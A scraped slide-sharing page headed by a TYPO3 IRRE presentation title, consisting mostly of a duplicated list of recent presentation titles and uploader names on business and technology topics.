TYPO3 Inline Relational Record Editing (IRRE)
 
TYPO3 4.6 & TYPO3 4.7
TYPO3 4.6 & TYPO3 4.7TYPO3 4.6 & TYPO3 4.7
TYPO3 4.6 & TYPO3 4.7
 

Último

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 

Último (20)

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
